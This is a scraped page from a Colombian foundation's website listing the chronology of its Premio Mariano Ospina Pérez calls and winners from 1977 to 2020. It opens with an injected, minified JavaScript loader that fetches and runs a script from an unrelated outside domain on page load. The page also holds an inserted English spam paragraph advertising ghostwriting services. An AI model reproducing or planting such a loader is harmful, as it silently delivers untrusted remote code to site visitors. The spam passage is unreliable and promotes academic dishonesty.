;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Cronología – Fundación Mariano Ospina Perez Skip to content

Cronología de convocatorias y ganadores de premios

Cronología de Convocatorias y ganadores de premios

Integrating writing services into the educational landscape is a strategic enhancement. Beyond being instrumental in meeting deadlines, these services, such as ghostwriting seminararbeit provide invaluable insights into the art of effective writing. Positioned as a dynamic supplement to traditional classroom learning, they introduce an alternative perspective, ultimately elevating the overall educational experience.
Embrace the power of enriched learning through our comprehensive writing services.

Ganadores de los Premios 1977 – 2020
«Premio Mariano Ospina Pérez»

Descargue toda la lista de todos los ganadores  de los diferentes de cada año desde 1977.

Lista de ganadores primer puesto desde el 1977 al 2020.

Ganadores segundo y tercer puesto a partir del año 2000 al 2020.

Galería de Fotos